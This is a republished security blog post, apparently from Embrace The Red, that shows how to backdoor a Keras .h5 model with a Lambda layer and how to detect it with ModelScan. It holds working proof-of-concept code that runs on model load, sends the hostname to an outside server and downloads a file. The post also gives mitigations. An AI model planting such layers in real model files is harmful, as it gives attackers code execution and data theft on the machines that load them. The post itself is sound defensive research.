By using this site, you agree to the Privacy Policy and Terms of Use.
Accept
Sécurité Helvétique News | AmyrisSécurité Helvétique News | AmyrisSécurité Helvétique News | Amyris
  • Home
  • Compliance
    Compliance
    Show More
    Top News
    Ukraine approves second sanctions package targeting Russian nuclear industry
    23 February 2023
    SEC Climate Disclosure Rules Finally Come Out; Scope 3 Emissions Reporting Not Required
    11 March 2024
    Bank of America’s Corporate Culture Crisis: A Study in Failure
    19 September 2024
    Latest News
    Fractured & Fraught — but Still Potentially Profitable: The State of ESG in 2025
    7 November 2025
    UK AML Reform in 2025: A Public Recalibration of Risk and Responsibility
    1 November 2025
    US National Security Compliance Risk & Readiness Report
    26 October 2025
    What Would a Farage Government Mean for Compliance?
    20 October 2025
  • Cyber Security
    Cyber Security
    Show More
    Top News
    Scandinavian Airlines website hit by cyber attack, customer details exposed
    21 February 2023
    Planet Ice hacked! 240,000 skating fans’ details stolen
    22 February 2023
    North Korea’s APT37 Targeting Southern Counterpart with New M2RAT Malware
    23 February 2023
    Latest News
    North Korean Hackers Target Developers with Malicious npm Packages
    30 August 2024
    Russian Hackers Exploit Safari and Chrome Flaws in High-Profile Cyberattack
    29 August 2024
    Vietnamese Human Rights Group Targeted in Multi-Year Cyberattack by APT32
    29 August 2024
    2.5 Million Reward Offered For Cyber Criminal Linked To Notorious Angler Exploit Kit
    29 August 2024
  • Technology
    Technology
    Show More
    Top News
    Sony shares details on Gran Turismo 7’s VR mode and 10 new PSVR 2 launch games
    21 February 2023
    The US Supreme Court Doesn’t Understand the Internet
    23 February 2023
    AI-Illustrated Comic Zarya of the Dawn Loses Key Copyright Case
    24 February 2023
    Latest News
    Why XSS still matters: MSRC’s perspective on a 25-year-old threat  | MSRC Blog
    9 September 2025
    Microsoft Bug Bounty Program Year in Review: $13.8M in Rewards | MSRC Blog
    28 August 2025
    Microsoft Bounty Program Year in Review: $16.6M in Rewards  | MSRC Blog
    27 August 2025
    postMessaged and Compromised | MSRC Blog
    26 August 2025
  • Businness
    Businness
    Show More
    Top News
    US stocks record worst day in two months on rate rise worries
    21 February 2023
    Putin’s war: how and when will it end?
    23 February 2023
    Yellen says U.S. inflation coming down but core measures remain elevated By Reuters
    24 February 2023
    Latest News
    Microvast Holdings earnings beat by $0.02, revenue topped estimates
    11 November 2025
    Client Challenge
    10 November 2025
    Peter Thiel warns if you ‘proletarianize the young people,’ don’t be surprised they end up communist
    9 November 2025
    US Supreme Court lets Trump withhold $4 billion in food aid funding for now
    8 November 2025
  • ÉmissionN
    Émission
    Cyber Security Podcasts
    Show More
    Top News
    Stream episode Cybercrime Wire For Feb. 25-26, 2023. Weekend Update. WCYB Digital Radio. by Cybercrime Magazine podcast
    25 February 2023
    Cyberwarfare Report, Week Of Mar. 3, 2023. Theresa Payton Reporting.
    5 March 2023
    Global CISO Report. The Human Side Of Security. Mary Rose Martinez, Marathon Petroleum Corporation.
    14 March 2023
    Latest News
    Stream episode Cybercrime Magazine Update: Cybercrime In India. Sheer Volume Overwhelming Police Forces. by Cybercrime Magazine podcast
    3 March 2025
    Autonomous SOC. Why It’s A Breakthrough For The Mid-Market. Subo Guha, SVP of Product, Stellar Cyber
    2 March 2025
    Cyber Safety. Protecting Families From Smart Toy Risks. Scott Schober, Author, "Hacked Again."
    2 March 2025
    Cybercrime News For Feb. 25, 2025. Hackers Steal $49M from Infini Crypto Fintech. WCYB Digital Radio
    2 March 2025
Search
Cyber Security
  • Application Security
  • Darknet
  • Data Protection
  • network vulnerability
  • Pentesting
Compliance
  • LPD
  • RGPD
  • Finance
  • Medical
Technology
  • AI
  • MICROSOFT
  • VERACODE
  • CHECKMARKX
  • WITHSECURE
  • Amyris
  • Contact
  • Disclaimer
  • Privacy Policy
  • About us
© 2023 Sécurité Helvétique NEWS par Amyris Sarl. Tous droits réservés
Reading: Backdooring Keras Models and How to Detect It · Embrace The Red
Share
Sign In
Notification Show More
Font ResizerAa
Sécurité Helvétique News | AmyrisSécurité Helvétique News | Amyris
Font ResizerAa
  • Home
  • Compliance
  • Cyber Security
  • Technology
  • Business
Search
  • Home
    • Compliance
    • Cyber Security
    • Technology
    • Businness
  • Legal Docs
    • Contact us
    • Disclaimer
    • Privacy Policy
    • About us
Have an existing account? Sign In
Follow US
  • Amyris
  • Contact
  • Disclaimer
  • Privacy Policy
  • About us
© 2023 Sécurité Helvétique par Amyris Sarl.
Sécurité Helvétique News | Amyris > Blog > Pentesting > Backdooring Keras Models and How to Detect It · Embrace The Red
Pentesting

Backdooring Keras Models and How to Detect It · Embrace The Red

webmaster
Last updated: 2024/05/19 at 4:04 AM
webmaster
Share
7 Min Read
SHARE

This post is part of a series about machine learning and artificial intelligence.

Adversaries often leverage supply chain attacks to gain footholds. In machine learning model deserialization issues are a significant threat, and detecting them is crucial, as they can lead to arbitrary code execution. We explored this attack with Python Pickle files in the past.

In this post we are covering backdooring the original Keras Husky AI model from the Machine Learning Attack Series, and afterwards we investigate tooling to detect the backdoor.

The technique described is based on this post by Microsoft, named Abusing ML model file formats to create malware on AI systems.

Let’s get started.

Revisiting Husky AI

The original Husky AI model is stored as an .h5 file. You can find it here.

Note: If you want to follow along check out this Notebook to follow along.

git clone https://huggingface.co/wunderwuzzi/huskyai

To get started let’s load up the original model:

import keras
model = keras.models.load_model("huskymodel.h5")
model.summary()

And do a random inference to ensure things work:

random_image = np.expand_dims(np.random.rand(128, 128, 3), axis=0)
prediction = model.predict(random_image, verbose=0)
print("Prediction output:", prediction)

Prediction output: [[0.1144329]]

Great, so things work.

Now let’s put ourselves into an attackers shoes.

Loading the Original Model

Assume we find the Husky AI Keras model file (in this case the .h5) file somewhere on a network share, where the production systems, developers and/or data scientists load it from.

Threat => This means the attacker can perform a supply chain attack by modifying the file and add malicious instructions.

Adding a Custom Layer

To add executable code, we can add a Keras lambda layer to the model architecture.

For the demo we:

  1. Print a “Hello world” message to visually demonstrate code execution and
  2. Download an image from a remote server and with the same web request leak the hostname of the machine (this way malware could be downloaded to the host)

The code looks like this:

temp_model = keras.models.load_model("huskymodel.h5")

def delicious_layer(x):
    print("Hello world! Husky AI is now backdoored.")

    import http.client, os
    if not os.path.exists("embracethered.png"):
      conn = http.client.HTTPSConnection("wuzzi.net")
      host = os.getenv("HOSTNAME")
      conn.request("GET", f"/l.png?lambdahost={host}")
      res = conn.getresponse()
      data = res.read()
      with open("embracethered.png", "wb") as f:
          f.write(data)
    return x

lambda_layer = keras.layers.Lambda(delicious_layer)
temp_model.add(lambda_layer)

Saving the Backdoored Model File

Finally, we compile the model using the original settings and save it.

temp_model.compile(optimizer=model.optimizer, loss=model.loss, metrics=model.metrics)
temp_model.save("huskymodel-lambda-backdoor")

There are multiple file format options when saving the model, more about this later.

Simulating the Attack

Now, let’s load the backdoored model.

backdoor_model = keras.models.load_model("huskymodel-lambda-backdoor")

backdoor layer added

As you can see in the screenshot above, the print statement was already executed!

Tip: If the model is saved as .keras, using the Keras v3 file format, then this load would fail.

This is because safe_mode=True is the default for v3, however safe_mode is not considered for older model formats. Unfortunatley, saving a model the newer format is not the default. Hence remember to use the .keras extension and/or file_format="keras" when saving model files.

Let’s take a look at the architecture to see if we can find the additional layer:

backdoor_model.summary()

Here we go:

backdoor layer added

Excellent, notice the last layer named lambda_17.

Checking the Result

As we observed earlier already, just loading the model executed the print function:

Hello world! Husky AI is now backdoored.

And when listing the directory structure we see the embracethered.png was indeed downloaded from the remote server.

-rw-r--r-- 1 root root  34K May 13 22:40 embracethered.png

And the server log also shows the hostname that was retrieved:

server log

Nice, but scary!

Inspecting and Identifying Backdoored Models

If you walk through the Notebook, you can find Python code to check for hidden lambda layers and Python byte code.

A very practical detection you should consider is Protect AI’s ModelScan tool.

pip install modelscan

Then you can point it to the model file:

modelscan -p huskymodel-lambda-backdoor

Observe that it indeed detected the backdoor:

modelscan output

Excellent. It’s great to have a open source tool available to detect this (and other) issues.

Severity levels are defined here. In our specific case, arbitrary code, include a file from a remote location is downloaded, which might make it higher severity then medium. So, make sure to investigate all flagged issues to look for malicious instructions.

Takeaway: I highly recommend integrating such tooling into your MLOps pipelines.

Mitigations and Detections

  • Signature Validation: Use signatures and/or validate hashes of models (e.g. SHA-256 hash)
  • Audits: Ensure auditing of model files from untrusted sources
  • Scanning and CI/CD: Explore scanning tools like Protect AI’s modelscan
  • Isolation: Load untrusted models in isolated environments (if possible)

Conclusion

As we can see, machine learning model files should be treated like binary executables. We also discussed how backdoored model files can be detected, and tooling for MLOps integration.

Hope this was helpful and interesting.

Cheers,
Johann.

References

Appendix

ML Attack Series – Overview

Modelscan Ouput

--- Summary ---

Total Issues: 1

Total Issues By Severity:

    - LOW: 0
    - MEDIUM: 1
    - HIGH: 0
    - CRITICAL: 0

--- Issues by Severity ---

--- MEDIUM ---

Unsafe operator found:
  - Severity: MEDIUM
  - Description: Use of unsafe operator 'Lambda' from module 'Keras'
  - Source: /content/huskyai/models/huskymodel-lambda-backdoor/keras_metadata.pb

Loading an Image

import numpy as np
import imageio
from skimage.transform import resize
import matplotlib.pyplot as plt

def load_image(name):
    image = np.array(imageio.imread(name))
    image = cv2.resize( image, (num_px, num_px))
    image = cv2.cvtColor(image, cv2.COLOR_RGBA2RGB)
   
    image = image/255.
    image = np.expand_dims(image, axis=0)
    #print(image.shape)
  
    #image_vector = image.reshape((1, num_px * num_px * 3)).T
    return image

Doing a Prediction

import cv2 
import imageio.v2 as imageio
num_px = 128
image1 = load_image("/tmp/images/val/husky/8b80a51b86ba1ec6cd7ae9bde6a32b4b.jpg")
plt.imshow(image1[0])
model.predict(image1) 

You Might Also Like

From Prompt Injection To Account Takeover · Embrace The Red

From Prompt Injection To Account Takeover · Embrace The Red

From Prompt Injection To Account Takeover · Embrace The Red

From Prompt Injection To Account Takeover · Embrace The Red

From Prompt Injection To Account Takeover · Embrace The Red

Sign Up For Daily Newsletter

Be keep up! Get the latest breaking news delivered straight to your inbox.

By signing up, you agree to our Terms of Use and acknowledge the data practices in our Privacy Policy. You may unsubscribe at any time.
Share This Article
Facebook Twitter Whatsapp Whatsapp LinkedIn Reddit Telegram Email Copy Link Print
Share
Previous Article How to Spot AI Audio Deepfakes at Election Time
Next Article Running Prowler To Evaluate Azure From AWS With MFA | by Teri Radichel | Cloud Security | May, 2024
Leave a comment Leave a comment

Comments (0) Cancel reply

Your email address will not be published. Required fields are marked *

Stay Connected

235.3k Followers Like
69.1k Followers Follow
11.6k Followers Pin
56.4k Followers Follow
136k Subscribers Subscribe
4.4k Followers Follow
- Advertisement -
Ad imageAd image

Latest News

SessionReaper (CVE-2025-54236) Exploited in Adobe Commerce
VERACODE 11 November 2025
From Prompt Injection To Account Takeover · Embrace The Red
Pentesting 11 November 2025
Microvast Holdings earnings beat by $0.02, revenue topped estimates
Businness 11 November 2025
From Prompt Injection To Account Takeover · Embrace The Red
Pentesting 11 November 2025
//

We influence 20 million users and is the number one business and technology news network on the planet

Sign Up for Our Newsletter

Subscribe to our newsletter to get our newest articles instantly!

Loading
Sécurité Helvétique News | AmyrisSécurité Helvétique News | Amyris
Follow US
© 2023 Sécurité Helvétique NEWS par Amyris Sarl. Tous droits réservés
Amyris news letter
Join Us!

Subscribe to our newsletter and never miss our latest news, podcasts etc..

Loading
Zero spam, Unsubscribe at any time.
login Amyris SH
Welcome Back!

Sign in to your account

Lost your password?